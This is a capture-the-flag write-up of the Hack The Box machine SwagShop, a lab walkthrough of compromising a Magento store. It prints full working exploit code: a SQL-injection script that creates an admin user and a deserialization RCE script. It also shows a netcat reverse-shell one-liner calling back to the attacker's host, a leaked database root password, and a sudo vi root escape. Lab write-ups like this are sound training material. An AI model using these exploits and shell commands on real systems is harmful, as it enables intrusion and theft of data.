SwagShop
Contents
Ports scan
u505@kali:~/HTB/Machines/SwagShop$ sudo masscan -e tun0 -p1-65535,U:1-65535 10.10.10.140 --rate=1000 [sudo] password for u505:
Starting masscan 1.0.5 at 2020-02-24 20:22:29 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth Initiating SYN Stealth Scan Scanning 1 hosts [131070 ports/host] Discovered open port 22/tcp on 10.10.10.140 Discovered open port 80/tcp on 10.10.10.140
u505@kali:~/HTB/Machines/SwagShop$ nmap -sC -sV 10.10.10.140 Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-24 15:22 EST Nmap scan report for swagshop.htb (10.10.10.140) Host is up (0.049s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 b6:55:2b:d2:4e:8f:a3:81:72:61:37:9a:12:f6:24:ec (RSA) | 256 2e:30:00:7a:92:f0:89:30:59:c1:77:56:ad:51:c0:ba (ECDSA) |_ 256 4c:50:d5:f2:70:c5:fd:c4:b2:f0:bc:42:20:32:64:34 (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Did not follow redirect to http://10.10.10.140/ Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 9.47 seconds
Web enumeration
u505@kali:~/HTB/Machines/SwagShop$ python3 /opt/utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirb/common2.txt -e "txt,php,js" -f -t 50 -u http://10.10.10.140
_|. _ _ _ _ _ _|_ v0.3.9 (_||| _) (/_(_|| (_| )
Extensions: txt, php, js | HTTP method: get | Threads: 50 | Wordlist size: 18443
Error Log: /opt/utils/dirsearch/logs/errors-20-02-24_15-28-23.log
Target: http://10.10.10.140
[15:28:23] Starting: [15:28:27] 403 - 300B - /.htpasswd.txt [15:28:27] 403 - 300B - /.htpasswd.php [15:28:27] 403 - 299B - /.htpasswd.js [15:28:27] 403 - 291B - /.php [15:28:31] 200 - 2KB - /app/ [15:28:31] 200 - 37B - /api.php [15:28:40] 200 - 0B - /cron.php [15:28:45] 200 - 2KB - /errors/ [15:28:52] 403 - 293B - /icons/ [15:28:52] 200 - 946B - /includes/ [15:28:52] 200 - 16KB - /index.php [15:28:52] 200 - 16KB - /index.php/ [15:28:53] 200 - 44B - /install.php [15:28:56] 200 - 3KB - /lib/ [15:28:56] 200 - 10KB - /LICENSE.txt [15:28:58] 200 - 2KB - /media/ [15:29:04] 200 - 1KB - /pkginfo/ [15:29:11] 403 - 301B - /server-status/ [15:29:12] 200 - 2KB - /shell/ [15:29:13] 200 - 1KB - /skin/ [15:29:20] 200 - 2KB - /var/
Task Completed
Searchsploit
u505@kali:~/HTB/Machines/SwagShop$ searchsploit magento
------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
------------------------------------------------------------------------- ----------------------------------------
Magento 1.2 - '/app/code/core/Mage/Admin/Model/Session.php?login['Userna | exploits/php/webapps/32808.txt
Magento 1.2 - '/app/code/core/Mage/Adminhtml/controllers/IndexController | exploits/php/webapps/32809.txt
Magento 1.2 - 'downloader/index.php' Cross-Site Scripting | exploits/php/webapps/32810.txt
Magento < 2.0.6 - Arbitrary Unserialize / Arbitrary Write File | exploits/php/webapps/39838.php
Magento CE < 1.9.0.1 - (Authenticated) Remote Code Execution | exploits/php/webapps/37811.py
Magento Server MAGMI Plugin - Multiple Vulnerabilities | exploits/php/webapps/35996.txt
Magento Server MAGMI Plugin 0.7.17a - Remote File Inclusion | exploits/php/webapps/35052.txt
Magento eCommerce - Local File Disclosure | exploits/php/webapps/19793.txt
Magento eCommerce - Remote Code Execution | exploits/xml/webapps/37977.py
eBay Magento 1.9.2.1 - PHP FPM XML eXternal Entity Injection | exploits/php/webapps/38573.txt
eBay Magento CE 1.9.2.1 - Unrestricted Cron Script (Code Execution / Den | exploits/php/webapps/38651.txt
------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result
The copyright is from 2014, https://www.cloudways.com/blog/magento-versions/ indicates that in 2014 the version should be 1.9.x
Admin user (exploit 37977)
u505@kali:~/HTB/Machines/SwagShop$ searchsploit -m 37977
Exploit: Magento eCommerce - Remote Code Execution
URL: https://www.exploit-db.com/exploits/37977
Path: /usr/share/exploitdb/exploits/xml/webapps/37977.py
File Type: ASCII text, with CRLF line terminators
Copied to: /home/u505/HTB/Machines/SwagShop/37977.py
If magento version is vulnerable, this script will create admin account with username forme and password forme
Our URL has index.php at the begining.
u505@kali:~/HTB/Machines/SwagShop$ vi exploituser.py u505@kali:~/HTB/Machines/SwagShop$ cat exploituser.py #Thanks to # Zero cool, code breaker ICA, Team indishell, my father , rr mam, jagriti and DON import requests import base64 import sys
target = "http://10.10.10.140/"
if not target.startswith("http"): target = "http://" + target
if target.endswith("/"): target = target[:-1]
target_url = target + "/index.php/admin/Cms_Wysiwyg/directive/index/"
q=""" SET @SALT = 'rp'; SET @PASS = CONCAT(MD5(CONCAT( @SALT , '{password}') ), CONCAT(':', @SALT )); SELECT @EXTRA := MAX(extra) FROM admin_user WHERE extra IS NOT NULL; INSERT INTO `admin_user` (`firstname`, `lastname`,`email`,`username`,`password`,`created`,`lognum`,`reload_acl_flag`,`is_active`,`extra`,`rp_token`,`rp_token_created_at`) VALUES ('Firstname','Lastname','email@example.com','{username}',@PASS,NOW(),0,0,1,@EXTRA,NULL, NOW()); INSERT INTO `admin_role` (parent_id,tree_level,sort_order,role_type,user_id,role_name) VALUES (1,2,0,'U',(SELECT user_id FROM admin_user WHERE username = '{username}'),'Firstname'); """
query = q.replace("\n", "").format(username="u505", password="u505") pfilter = "popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);{0}".format(query)
# e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ decoded isTemplate:Block type=Adminhtml/report search grid output=getCsvFile r = requests.post(target_url, data={"___directive": "e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ", "filter": base64.b64encode(pfilter), "forwarded": 1}) if r.ok: print "WORKED" print "Check {0}/admin with creds u505:u505".format(target) else: print "DID NOT WORK"
We run the exploit
u505@kali:~/HTB/Machines/SwagShop$ python exploituser.py WORKED Check http://10.10.10.140/admin with creds u505:u505
We login at the admin portal with user u505 and apssword u505.
Remote code execution (exploit 37811)
u505@kali:~/HTB/Machines/SwagShop$ searchsploit -m 37811
Exploit: Magento CE < 1.9.0.1 - (Authenticated) Remote Code Execution
URL: https://www.exploit-db.com/exploits/37811
Path: /usr/share/exploitdb/exploits/php/webapps/37811.py
File Type: Python script, ASCII text executable, with CRLF line terminators
Copied to: /home/u505/HTB/Machines/SwagShop/37811.py
This script needs an authenticated user (that we have from previous exploit)
u505@kali:~/HTB/Machines/SwagShop$ curl --no-progress-meter http://10.10.10.140/app/etc/local.xml | grep -A2 "<install>" <install> <date><![CDATA[Wed, 08 May 2019 07:23:09 +0000]]></date> </install>
Debug
We debug the script with ipython to fix an issue, and the query.
In [28]: request = br.open(url + 'block/tab_orders/period/7d/?isAjax=true', data='isAjax=false&form_key=' + key)
In [29]: print request.read() <div style="margin:20px;"> <p class="switcher a-right" style="padding:5px 10px;">Select Range: <select name="period" id="order_orders_period" onchange="changeDiagramsPeriod(this);"> <option value="24h" >Last 24 Hours</option> <option value="7d" selected="selected">Last 7 Days</option> <option value="1m" >Current Month</option> <option value="1y" >YTD</option> <option value="2y" >2YTD</option> </select></p><br/> <p class="a-center" style="width:587px;height:300px; margin:0 auto;">No Data Found</p> </div>
In [30]: request = br.open(url + 'block/tab_orders/period/2y/?isAjax=true', data='isAjax=false&form_key=' + key)
In [31]: print request.read() <div style="margin:20px;"> <p class="switcher a-right" style="padding:5px 10px;">Select Range: <select name="period" id="order_orders_period" onchange="changeDiagramsPeriod(this);"> <option value="24h" >Last 24 Hours</option> <option value="7d" >Last 7 Days</option> <option value="1m" >Current Month</option> <option value="1y" >YTD</option> <option value="2y" selected="selected">2YTD</option> </select></p><br/> <p style="width:587px;height:300px; margin:0 auto;"><img src="http://10.10.10.140/index.php/admin/dashboard/tunnel/key/7c135be70c46a2113a2dbc9ab6d59779/?ga=YTo5OntzOjM6ImNodCI7czoyOiJsYyI7czozOiJjaGYiO3M6Mzk6ImJnLHMsZjRmNGY0fGMsbGcsOTAsZmZmZmZmLDAuMSxlZGVkZWQsMCI7czozOiJjaG0iO3M6MTQ6IkIsZjRkNGIyLDAsMCwwIjtzOjQ6ImNoY28iO3M6NjoiZGI0ODE0IjtzOjM6ImNoZCI7czoyNDoiZTpBQUFBQUFxcUFBQUFBQUFBQUFBQUFBIjtzOjQ6ImNoeHQiO3M6MzoieCx5IjtzOjQ6ImNoeGwiO3M6NTk6IjA6fHwwMi8yMDE5fHwwNS8yMDE5fHwwOC8yMDE5fHwxMC8yMDE5fHwxMi8yMDE5fHwxOnwwfDF8MnwzIjtzOjM6ImNocyI7czo3OiI1ODd4MzAwIjtzOjM6ImNoZyI7czoyMjoiMTAsMzMuMzMzMzMzMzMzMzMzLDEsMCI7fQ%253D%253D&h=6f7a4c132dd5b15d0f7729b4d61b29d1" alt="chart" title="chart" /></p> </div>
Final script
u505@kali:~/HTB/Machines/SwagShop$ cat exploitrce.py #!/usr/bin/python # Exploit Title: Magento CE < 1.9.0.1 Post Auth RCE # Google Dork: "Powered by Magento" # Date: 08/18/2015 # Exploit Author: @Ebrietas0 || http://ebrietas0.blogspot.com # Vendor Homepage: http://magento.com/ # Software Link: https://www.magentocommerce.com/download # Version: 1.9.0.1 and below # Tested on: Ubuntu 15 # CVE : none
from hashlib import md5 import sys import re import base64 import mechanize
def usage(): print "Usage: python %s <target> <argument>\nExample: python %s http://localhost \"uname -a\"" sys.exit()
if len(sys.argv) != 3: usage()
# Command-line args target = sys.argv[1] arg = sys.argv[2]
# Config. username = 'u505' password = 'u505' php_function = 'system' # Note: we can only pass 1 argument to the function #install_date = 'Sat, 15 Nov 2014 20:27:57 +0000' # This needs to be the exact date from /app/etc/local.xml install_date = 'Wed, 08 May 2019 07:23:09 +0000' # This needs to be the exact date from /app/etc/local.xml
# POP chain to pivot into call_user_exec payload = 'O:8:\"Zend_Log\":1:{s:11:\"\00*\00_writers\";a:2:{i:0;O:20:\"Zend_Log_Writer_Mail\":4:{s:16:' \ '\"\00*\00_eventsToMail\";a:3:{i:0;s:11:\"EXTERMINATE\";i:1;s:12:\"EXTERMINATE!\";i:2;s:15:\"' \ 'EXTERMINATE!!!!\";}s:22:\"\00*\00_subjectPrependText\";N;s:10:\"\00*\00_layout\";O:23:\"' \ 'Zend_Config_Writer_Yaml\":3:{s:15:\"\00*\00_yamlEncoder\";s:%d:\"%s\";s:17:\"\00*\00' \ '_loadedSection\";N;s:10:\"\00*\00_config\";O:13:\"Varien_Object\":1:{s:8:\"\00*\00_data\"' \ ';s:%d:\"%s\";}}s:8:\"\00*\00_mail\";O:9:\"Zend_Mail\":0:{}}i:1;i:2;}}' % (len(php_function), php_function, len(arg), arg) # Setup the mechanize browser and options br = mechanize.Browser() #br.set_proxies({"http": "localhost:8080"}) br.set_handle_robots(False)
request = br.open(target)
br.select_form(nr=0) #br.form.new_control('text', 'login[username]', {'value': username}) # Had to manually add username control. br.form.fixup() br['login[username]'] = username br['login[password]'] = password
br.method = "POST" request = br.submit() content = request.read()
url = re.search("ajaxBlockUrl = \'(.*)\'", content) url = url.group(1) key = re.search("var FORM_KEY = '(.*)'", content) key = key.group(1)
#request = br.open(url + 'block/tab_orders/period/7d/?isAjax=true', data='isAjax=false&form_key=' + key) request = br.open(url + 'block/tab_orders/period/2y/?isAjax=true', data='isAjax=false&form_key=' + key) tunnel = re.search("src=\"(.*)\?ga=", request.read()) tunnel = tunnel.group(1)
payload = base64.b64encode(payload) gh = md5(payload + install_date).hexdigest()
exploit = tunnel + '?ga=' + payload + '&h=' + gh
try: request = br.open(exploit) except (mechanize.HTTPError, mechanize.URLError) as e: print e.read()
Test execution
u505@kali:~/HTB/Machines/SwagShop$ python exploitrce.py http://10.10.10.140/index.php/admin/ "uname -a" Linux swagshop 4.4.0-146-generic #172-Ubuntu SMP Wed Apr 3 09:00:08 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux u505@kali:~/HTB/Machines/SwagShop$ python exploitrce.py http://10.10.10.140/index.php/admin/ "whoami" www-data
Remote shell
u505@kali:~/HTB/Machines/SwagShop$ rlwrap nc -nlvp 4444 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::4444 Ncat: Listening on 0.0.0.0:4444
We launch the exploit
u505@kali:~/HTB/Machines/SwagShop$ python exploitrce.py http://10.10.10.140/index.php/admin/ "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.30 4444 >/tmp/f"
And we have our reverse shell
u505@kali:~/HTB/Machines/SwagShop$ rlwrap nc -nlvp 4444 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::4444 Ncat: Listening on 0.0.0.0:4444 Ncat: Connection from 10.10.10.140. Ncat: Connection from 10.10.10.140:34256. /bin/sh: 0: can't access tty; job control turned off $ python -c "import pty;pty.spawn('/bin/bash')" /bin/sh: 1: python: not found $ python3 -c "import pty;pty.spawn('/bin/bash')" www-data@swagshop:/var/www/html$ stty raw -echo stty raw -echo
User flag
www-data@swagshop:/home/haris$ ls -la total 36 drwxr-xr-x 3 haris haris 4096 May 8 2019 . drwxr-xr-x 3 root root 4096 May 2 2019 .. -rw------- 1 haris haris 54 May 2 2019 .Xauthority lrwxrwxrwx 1 root root 9 May 8 2019 .bash_history -> /dev/null -rw-r--r-- 1 haris haris 220 May 2 2019 .bash_logout -rw-r--r-- 1 haris haris 3771 May 2 2019 .bashrc drwx------ 2 haris haris 4096 May 2 2019 .cache -rw------- 1 root root 1 May 8 2019 .mysql_history -rw-r--r-- 1 haris haris 655 May 2 2019 .profile -rw-r--r-- 1 haris haris 0 May 2 2019 .sudo_as_admin_successful -rw-r--r-- 1 haris haris 33 May 8 2019 user.txt www-data@swagshop:/home/haris$ cat user.txt <USER_FLAG>
MySQL access
In a configuration file we find the MySQL access.
www-data@swagshop:/var/www/html/app/etc$ cat local.xml | grep -A10 "<connection>"
<connection>
<host><![CDATA[localhost]]></host>
<username><![CDATA[root]]></username>
<password><![CDATA[fMVWh7bDHpgZkyfqQXreTjU9]]></password>
<dbname><![CDATA[swagshop]]></dbname>
<initStatements><![CDATA[SET NAMES utf8]]></initStatements>
<model><![CDATA[mysql4]]></model>
<type><![CDATA[pdo_mysql]]></type>
<pdoType><![CDATA[]]></pdoType>
<active>1</active>
</connection>
We can log into the database
www-data@swagshop:/var/www/html/app/etc$ mysql -u root -p swagshop mysql -u root -p swagshop Enter password: fMVWh7bDHpgZkyfqQXreTjU9
Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A
Welcome to the MySQL monitor. Commands end with ; or \g. Your MySQL connection id is 53 Server version: 5.7.26-0ubuntu0.16.04.1 (Ubuntu)
Copyright (c) 2000, 2019, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its affiliates. Other names may be trademarks of their respective owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> select * from admin_user; select * from admin_user; +---------+-----------+----------+-------------------+----------+-------------------------------------------------------------------+---------------------+---------------------+---------------------+--------+-----------------+-----------+-------+----------+---------------------+ | user_id | firstname | lastname | email | username | password | created | modified | logdate | lognum | reload_acl_flag | is_active | extra | rp_token | rp_token_created_at | +---------+-----------+----------+-------------------+----------+-------------------------------------------------------------------+---------------------+---------------------+---------------------+--------+-----------------+-----------+-------+----------+---------------------+ | 1 | Haris | Swagger | haris@htbswag.net | haris | 8512c803ecf70d315b7a43a1c8918522:lBHk0AOG0ux8Ac4tcM1sSb1iD5BNnRJp | 2019-05-08 07:23:09 | 2019-05-08 07:23:09 | 2019-08-27 07:04:13 | 13 | 0 | 1 | N; | NULL | NULL | | 2 | Firstname | Lastname | email@example.com | u505 | 07ca45d11f9f28280459ba9b6afb72f9:rp | 2020-02-24 16:28:38 | NULL | 2020-02-24 22:15:41 | 6 | 0 | 1 | N; | NULL | 2020-02-24 16:28:38 | +---------+-----------+----------+-------------------+----------+-------------------------------------------------------------------+---------------------+---------------------+---------------------+--------+-----------------+-----------+-------+----------+---------------------+ 2 rows in set (0.00 sec)
mysql> quit quit Bye
Escalation of privileges
sudo
www-data@swagshop:/var/www$ sudo -l
Matching Defaults entries for www-data on swagshop:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on swagshop:
(root) NOPASSWD: /usr/bin/vi /var/www/html/*
User www-data can run vi with sudo to edit files in /var/www/html
run shell from vi
www-data@swagshop:/var/www$ sudo /usr/bin/vi /var/www/html/u505 From the vi session :!/bin/bash
~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ :!/bin/bash root@swagshop:/var/www# whoami root
Root flag
root@swagshop:/var/www# cat /root/root.txt <ROOT_FLAG>
___ ___ /| |/|\| |\ /_| ´ |.` |_\ We are open! (Almost) | |. | | |. | Join the beta HTB Swag Store! |___|.__| https://hackthebox.store/password
PS: Use root flag as password!
References
Daniel Simao 03:57, 23 February 2020 (EST)
